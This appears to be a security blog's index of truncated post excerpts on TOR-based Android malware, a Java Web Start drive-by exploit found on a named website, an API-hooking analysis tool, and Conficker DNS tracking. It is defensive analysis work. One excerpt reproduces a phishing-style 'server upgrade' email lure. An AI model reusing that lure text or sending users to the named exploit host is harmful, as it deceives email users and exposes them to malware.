Several security firms recently discovered TOR based malware on android platform. As we received the sample, we make some quick analysis on it.
The sample has been reported to have C&C capability which is using unusual top level domain name (.onion). This TLD is usually used by TOR. The use of Orbot TOR Client on this […]
The recent discovery of Java Web Start Argument Injection vulnerability (CVE-2010-0886 and CVE-2010-0887) has opened a new opportunity for the bad guy to utilize it in drive-by download attack. Here is a short write up on the example (in the wild) found early today, which exploiting this vulnerability. The exploit was found on http://buckomre.com/ and […]
MyCERT have been developing a few analysis tools for reversing. MySuntikanAPI is still in alpha version and need more improvement. Every hooked API will capture detail information to make sure we don’t miss any behavior especially in malware sample. API Hooking is same as IAT hooking. One of the tools that we created is called […]
Attention! On October 22, 2009 server upgrade will take place. Due to this the system may be offline for approximately half an hour. The changes will concern security, reliability and performance of mail service and the system as a whole. For compatibility of your browsers and mail clients with upgraded server software you should run […]
We have been working to track conficker’s dns queries in order to identify infected machines/network with conficker.c. Tracking a 50K DNS names and 500++ queries from each conficker is a bit troublesome when u have to record all the DNS queries (200M records/day) and compare it with 50K/day conficker.c domain names.:). The main idea of […]